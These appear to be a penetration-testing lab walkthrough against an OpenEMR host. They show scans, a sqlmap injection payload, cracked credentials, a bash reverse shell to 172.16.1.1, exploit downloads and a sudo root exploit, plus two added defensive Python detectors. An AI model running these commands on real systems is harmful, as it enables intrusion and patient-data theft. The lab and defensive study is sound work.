VHL — Records
OpenEMR medical records application. Exploited a pre-auth SQL injection CVE and file upload for shell access.
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.30
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 17:22 EST
Nmap scan report for 10.11.1.30
Host is up (0.022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:2f:00:ee:50:28:41:23:b5:a7:05:a8:be:98:4f:ab (RSA)
| 256 d5:b3:d8:3a:e7:df:4b:a0:1c:f8:52:78:07:b9:9c:6b (ECDSA)
|_ 256 d3:86:a0:97:da:d9:15:fe:1b:8b:f6:2c:20:0a:02:2f (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 21.68 ms 10.11.1.30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.29 seconds
21
21/tcp open ftp vsftpd 3.0.3

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.11.1.30
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 17:24:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.11.1.30:21/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 17:24:37

80
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ )

directory search
dirsearch -u http://10.11.1.30
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/vhl/Records/reports/http_10.11.1.30/_25-02-11_17-33-53.txt
Target: http://10.11.1.30/
[17:33:53] Starting:
[17:33:55] 403 - 275B - /.ht_wsr.txt
[17:33:55] 403 - 275B - /.htaccess.bak1
[17:33:55] 403 - 275B - /.htaccess.sample
[17:33:55] 403 - 275B - /.htaccess.save
[17:33:55] 403 - 275B - /.htaccess.orig
[17:33:55] 403 - 275B - /.htaccess_orig
[17:33:55] 403 - 275B - /.htaccess_sc
[17:33:55] 403 - 275B - /.htaccessOLD
[17:33:55] 403 - 275B - /.htaccess_extra
[17:33:55] 403 - 275B - /.htaccessBAK
[17:33:55] 403 - 275B - /.htm
[17:33:55] 403 - 275B - /.html
[17:33:55] 403 - 275B - /.htaccessOLD2
[17:33:55] 403 - 275B - /.htpasswds
[17:33:55] 403 - 275B - /.htpasswd_test
[17:33:55] 403 - 275B - /.httr-oauth
[17:33:56] 403 - 275B - /.php
[17:34:01] 200 - 518B - /admin.php
[17:34:09] 200 - 4KB - /bower.json
[17:34:09] 200 - 1KB - /build.xml
[17:34:10] 200 - 509B - /ci/
[17:34:10] 200 - 455B - /cloud/
[17:34:10] 301 - 308B - /cloud -> http://10.11.1.30/cloud/
[17:34:11] 200 - 496B - /common/
[17:34:11] 301 - 309B - /common -> http://10.11.1.30/common/
[17:34:11] 200 - 3KB - /composer.json
[17:34:11] 301 - 309B - /config -> http://10.11.1.30/config/
[17:34:11] 200 - 475B - /config/
[17:34:11] 200 - 259KB - /composer.lock
[17:34:12] 200 - 3KB - /CONTRIBUTING.md
[17:34:12] 200 - 37B - /controller.php
[17:34:12] 200 - 651B - /controllers/
[17:34:12] 200 - 820B - /custom/
[17:34:13] 200 - 4KB - /docker-compose.yml
[17:34:18] 301 - 309B - /images -> http://10.11.1.30/images/
[17:34:18] 200 - 965B - /images/
[17:34:21] 301 - 310B - /library -> http://10.11.1.30/library/
[17:34:21] 200 - 34KB - /LICENSE
[17:34:24] 301 - 310B - /modules -> http://10.11.1.30/modules/
[17:34:24] 200 - 456B - /modules/
[17:34:30] 200 - 3KB - /portal/
[17:34:30] 301 - 309B - /portal -> http://10.11.1.30/portal/
[17:34:31] 301 - 309B - /public -> http://10.11.1.30/public/
[17:34:31] 200 - 467B - /public/
[17:34:32] 200 - 3KB - /README.md
[17:34:34] 403 - 275B - /server-status
[17:34:34] 403 - 275B - /server-status/
[17:34:34] 301 - 311B - /services -> http://10.11.1.30/services/
[17:34:34] 200 - 566B - /services/
[17:34:34] 200 - 673B - /setup.php
[17:34:35] 301 - 308B - /sites -> http://10.11.1.30/sites/
[17:34:36] 301 - 306B - /sql -> http://10.11.1.30/sql/
[17:34:36] 200 - 1KB - /sql/
[17:34:38] 200 - 603B - /templates/
[17:34:38] 301 - 312B - /templates -> http://10.11.1.30/templates/
[17:34:38] 200 - 505B - /tests/
[17:34:38] 301 - 308B - /tests -> http://10.11.1.30/tests/
[17:34:40] 200 - 0B - /vendor/autoload.php
[17:34:40] 200 - 0B - /vendor/composer/autoload_namespaces.php
[17:34:40] 200 - 0B - /vendor/composer/autoload_real.php
[17:34:40] 200 - 802B - /vendor/
[17:34:40] 200 - 0B - /vendor/composer/autoload_static.php
[17:34:40] 200 - 1KB - /vendor/composer/LICENSE
[17:34:40] 200 - 0B - /vendor/composer/autoload_psr4.php
[17:34:40] 200 - 1KB - /vendor/phpunit/phpunit/phpunit
[17:34:40] 200 - 0B - /vendor/composer/autoload_files.php
[17:34:40] 200 - 0B - /vendor/composer/ClassLoader.php
[17:34:40] 200 - 0B - /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[17:34:40] 200 - 0B - /vendor/composer/autoload_classmap.php
[17:34:41] 200 - 241KB - /vendor/composer/installed.json
Task Completed

hashcat
hashcat -m 100 '9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684' /usr/share/wordlists/rockyou.txt
9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684:pass

creds
admin:pass
openemr 5.0.1
admin.php

msfconsole openemr_sqli_dump
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > options
Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /openemr yes The base path to the OpenEMR installation
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > set rhosts 10.11.1.30
rhosts => 10.11.1.30
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > run
[*] Running module against 10.11.1.30
[-] Auxiliary aborted due to failure: not-vulnerable: The target does not seem vulnerable.
[*] Auxiliary module execution completed
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > set targeturi /
targeturi => /
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > run
[*] Running module against 10.11.1.30
openemr SQLi
- https://www.rapid7.com/db/modules/auxiliary/sqli/openemr/openemr_sqli_dump/
- searching through the openemr schema: the users_secure table holds authentication details
- looking at the metasploit module
- can turn this into sqlmap
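A defender-side view of the same injection point, added here as an example and not part of the original notes: it parses Apache combined-format access log lines (a constructed sample is embedded) and flags requests to interface/forms/eye_mag/taskman.php whose integer id parameters carry quotes, SQL keywords or hex literals, as the boolean-blind probe from the sqlmap run on this page does, and counts hits per source IP, since blind extraction needs many requests. The log format, the parameter list and the burst threshold are assumptions.

```python
"""Flag OpenEMR taskman.php from_id injection attempts in Apache access logs (added example)."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log prefix (Ubuntu's apache2 default); referer/UA after the size are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# The unauthenticated injection point used on this box; OpenEMR treats these ids as integers.
VULN_ENDPOINT = "/interface/forms/eye_mag/taskman.php"
INT_PARAMS = ("from_id", "to_id", "pid", "doc_type", "doc_id", "enc")
# Keywords, quotes and hex literals that have no business inside an integer id.
SQL_MARKERS = re.compile(r"(?i)\b(select|union|and|or|sleep|benchmark)\b|0x[0-9a-f]+|['\"()]")

# Constructed sample: a normal request, the sqlmap boolean-blind probe (URL-encoded as it
# travels on the wire), an unrelated login hit, and a non-numeric id from another client.
SAMPLE_LOG = """\
10.11.1.99 - - [11/Feb/2025:20:55:43 -0500] "GET /interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1 HTTP/1.1" 200 1234 "-" "sqlmap/1.9"
10.11.1.99 - - [11/Feb/2025:20:55:43 -0500] "GET /interface/forms/eye_mag/taskman.php?action=make_task&from_id=1%27%2B%28SELECT%200x71756578%20WHERE%204806%3D4806%20AND%203057%3D3057%29%2B%27&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1 HTTP/1.1" 200 1234 "-" "sqlmap/1.9"
10.11.1.50 - - [11/Feb/2025:20:56:01 -0500] "GET /interface/login/login.php?site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.11.1.77 - - [11/Feb/2025:20:56:02 -0500] "GET /interface/forms/eye_mag/taskman.php?action=make_task&from_id=abc&to_id=1 HTTP/1.1" 200 1234 "-" "curl/7.68.0"
"""


def parse_line(line):
    """Split one access-log line into its fields, or return None for lines we cannot parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Return a reason string if the request path looks like an injection attempt, else None."""
    parts = urlsplit(path)
    if parts.path != VULN_ENDPOINT:
        return None
    # parse_qs percent-decodes once, so "1%27%2B(" becomes "1'+(" just as PHP sees it.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in INT_PARAMS:
        for value in params.get(name, []):
            if value.isdigit():
                continue
            if SQL_MARKERS.search(value):
                return f"{name}: SQL metacharacters in integer parameter"
            return f"{name}: non-numeric value"
    return None


def scan(lines, burst_threshold=20):
    """Return (alerts, bursts): per-request findings and source IPs at or over the threshold."""
    alerts = []
    per_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify(rec["path"])
        if reason is not None:
            alerts.append((rec["ip"], rec["ts"], rec["status"], reason))
            per_ip[rec["ip"]] += 1
    # Blind boolean extraction needs hundreds of requests, so a burst from one IP is the
    # strong signal; the threshold here is an assumption to tune per site.
    bursts = {ip: n for ip, n in per_ip.items() if n >= burst_threshold}
    return alerts, bursts


if __name__ == "__main__":
    found, noisy = scan(SAMPLE_LOG.splitlines())
    for ip, ts, status, reason in found:
        print(f"{ts} {ip} HTTP {status}: {reason}")
    print("bursting sources:", noisy or "none")
```

Note that the injected request still returned HTTP 200, so status-code alerting alone would miss it; the parameter check is what catches it.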

sqlmap
sqlmap -u "http://10.11.1.30/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1" --batch --dbms=mysql -p from_id --level=5 --risk=3 --technique=B --dbs
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:55:43 /2025-02-11/
[20:55:43] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('OpenEMR=8tob7acq3ur...4bdhigg4th'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: from_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=make_task&from_id=1'+(SELECT 0x71756578 WHERE 4806=4806 AND 3057=3057)+'&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1
---
[20:55:43] [INFO] testing MySQL
[20:55:43] [INFO] confirming MySQL
[20:55:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0 (Aurora fork)
[20:55:43] [INFO] fetching database names
[20:55:43] [INFO] fetching number of databases
[20:55:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:55:43] [INFO] retrieved:
[20:55:43] [WARNING] reflective value(s) found and filtering out
2
[20:55:44] [INFO] retrieved: information
[20:56:27] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[20:56:27] [WARNING] unexpected response detected. Will use (extra) validation step in similar cases
[20:56:27] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
_schema
[20:56:33] [INFO] retrieved: openemr
available databases [2]:
[*] information_schema
[*] openemr

sqlmap -u "http://10.11.1.30/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1" --batch --dbms=mysql -p from_id --level=5 --risk=3 --technique=B -D openemr --tables
Database: openemr
[234 tables]
+---------------------------------------+

sqlmap -u "http://10.11.1.30/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1" --batch --dbms=mysql -p from_id --level=5 --risk=3 --technique=B -D openemr -T users_secure --dump
Database: openemr
Table: users_secure
[2 entries]
+----+--------------------------------+--------------------------------------------------------------+-------------+---------------------+---------------+---------------+-------------------+-------------------+
| id | salt | password | username | last_update | salt_history1 | salt_history2 | password_history1 | password_history2 |
+----+--------------------------------+--------------------------------------------------------------+-------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1 | $2a$05$0D9tdLH6yHrawC/bKZi/wy$ | $2a$05$0D9tdLH6yHrawC/bKZi/wu.VnpS2HCZsgrJyzlx2wbLrw0W6mjLY. | admin | 2021-03-29 07:44:58 | NULL | NULL | NULL | NULL |
| 4 | $2a$05$Ju5hhjtjjpagmKLsUUUazl$ | $2a$05$Ju5hhjtjjpagmKLsUUUazeet/U1GNwrZviIZ6BE8pgeaD/ofohKSy | emrvpsadmin | 2021-03-29 07:46:33 | NULL | NULL | NULL | NULL |
+----+--------------------------------+--------------------------------------------------------------+-------------+---------------------+---------------+---------------+-------------------+-------------------+

hashcat
hashcat -m 3200 '$2a$05$0D9tdLH6yHrawC/bKZi/wu.VnpS2HCZsgrJyzlx2wbLrw0W6mjLY.' /usr/share/wordlists/rockyou.txt
$2a$05$0D9tdLH6yHrawC/bKZi/wu.VnpS2HCZsgrJyzlx2wbLrw0W6mjLY.:zxcvbn

hashcat -m 3200 '$2a$05$Ju5hhjtjjpagmKLsUUUazeet/U1GNwrZviIZ6BE8pgeaD/ofohKSy' /usr/share/wordlists/rockyou.txt
$2a$05$Ju5hhjtjjpagmKLsUUUazeet/U1GNwrZviIZ6BE8pgeaD/ofohKSy:147258369

creds
- both work
admin:zxcvbn
emrvpsadmin:147258369

OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
python2 45161.py -u admin -p zxcvbn -c 'bash -i >& /dev/tcp/172.16.1.1/1234 0>&1' http://10.11.1.30

nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.30] 44642
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
www-data@records:/var/www/html/interface/main$ whoami
whoami
www-data

password reuse for emrvpsadmin
www-data@records:/home$ su emrvpsadmin
su emrvpsadmin
Password: 147258369
whoami
emrvpsadmin

emrvpsadmin id_rsa
emrvpsadmin@records:~/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----

ssh -i id_rsa emrvpsadmin@10.11.1.30
emrvpsadmin@records:~$ whoami
emrvpsadmin

priv esc
emrvpsadmin@records:~$ uname -a
Linux records 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
emrvpsadmin@records:~$ cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.1 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:9.3.0-1ubuntu2 amd64 GNU C++ compiler
ii g++-9 9.3.0-17ubuntu1~20.04 amd64 GNU C++ compiler
ii gcc 4:9.3.0-1ubuntu2 amd64 GNU C compiler
ii gcc-9 9.3.0-17ubuntu1~20.04 amd64 GNU C compiler
/usr/bin/gcc

╔══════════╣ MySQL version
mysql Ver 8.0.23-0ubuntu0.20.04.1 for Linux on x86_64 ((Ubuntu))

Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

emrvpsadmin@records:~$ wget http://172.16.1.1/50135.c
emrvpsadmin@records:~$ gcc -o exploit 50135.c

linux exploit suggester
emrvpsadmin@records:~$ ./linux-exploit-suggester.sh
Available information:
Kernel version: 5.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 20.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

wget https://raw.githubusercontent.com/aels/CVE-2022-2586-LPE/refs/heads/main/CVE-2022-2586.c
emrvpsadmin@records:~$ wget http://172.16.1.1/CVE-2022-2586.c
scp -i id_rsa -r CVE-2021-4034-main emrvpsadmin@10.11.1.30:/home/emrvpsadmin

database config
emrvpsadmin@records:/var/www/html/sites/default$ cat sqlconf.php
<?php
// OpenEMR
// MySQL Config
$host = 'localhost';
$port = '3306';
$login = 'openemr_user';
$pass = 'P@ssw0rD1$85!';
$dbase = 'openemr';
//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;
$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
//////////////////////////
//////////////////////////
//////////////////////////
//////DO NOT TOUCH THIS///
$config = 1; /////////////
//////////////////////////
//////////////////////////
//////////////////////////
?>

emrvpsadmin@records:/var/www/html/sites/default$ mysql -u 'openemr_user' -p'P@ssw0rD1$85!'

sudo CVE-2021-3156
- https://github.com/worawit/CVE-2021-3156
unzip CVE-2021-3156-main.zip -d ./
scp -i id_rsa -r CVE-2021-3156-main/ emrvpsadmin@10.11.1.30:/home/emrvpsadmin

emrvpsadmin@records:~/CVE-2021-3156-main$ ./exploit_nss.py
# whoami
root

emrvpsadmin@records:~/CVE-2021-3156-main$ ./exploit_nss.py
# whoami
root
# cat /root/key.txt
9416snu86rmffnkx290j
# date
Wed Feb 12 06:38:32 UTC 2025
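An added check for the sudo step above, not from the original notes: it parses the version string linpeas printed (Sudo version 1.8.31) against the upstream affected ranges for CVE-2021-3156 and, because distributions backport the fix without changing that number, also interprets the Qualys advisory's non-destructive sudoedit -s / test, which is the result a defender should rely on when deciding whether a host needs the patch. The combined verdict strings are assumptions of this example.

```python
"""Check sudo against CVE-2021-3156 (Baron Samedit) the way a defender would (added example)."""
import re

# Affected upstream releases per the Qualys advisory: 1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1;
# fixed in 1.8.32 and 1.9.5p2.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")
FIXED_18 = (1, 8, 32, 0)
FIXED_19 = (1, 9, 5, 2)


def parse_version(text):
    """Turn 'Sudo version 1.8.31' or '1.9.5p1' into a comparable (major, minor, patch, plevel)."""
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def upstream_vulnerable(version):
    """True when the upstream version number falls inside the affected ranges."""
    if (1, 8, 2, 0) <= version < FIXED_18:
        return True
    if (1, 9, 0, 0) <= version < FIXED_19:
        return True
    return False


def classify_sudoedit_output(output):
    """Interpret the advisory's test 'sudoedit -s /' run as an unprivileged user.

    A vulnerable build rejects the path with 'not a regular file' (it reached the buggy
    code path); a patched build rejects the option combination with a usage message.
    """
    if "not a regular file" in output:
        return "vulnerable"
    if output.lstrip().startswith("usage:"):
        return "patched"
    return "unknown"


def assess(version_line, sudoedit_output=None):
    """Combine both signals into one verdict.

    Distributions backport fixes without bumping the upstream version (Ubuntu 20.04 shipped
    the fix as a 1.8.31-based package), so a version match alone means only 'possibly
    vulnerable'; the sudoedit behaviour, when available, decides.
    """
    by_version = upstream_vulnerable(parse_version(version_line))
    if sudoedit_output is not None:
        behaviour = classify_sudoedit_output(sudoedit_output)
        if behaviour != "unknown":
            return behaviour
    return "possibly vulnerable (verify package patch level)" if by_version else "not affected"


if __name__ == "__main__":
    # The box in these notes reported sudo 1.8.31 and the exploit succeeded, so its package
    # had not received the backported fix.
    print(assess("Sudo version 1.8.31"))
    print(assess("Sudo version 1.8.31", "sudoedit: /: not a regular file"))
    print(assess("Sudo version 1.9.5p2"))
```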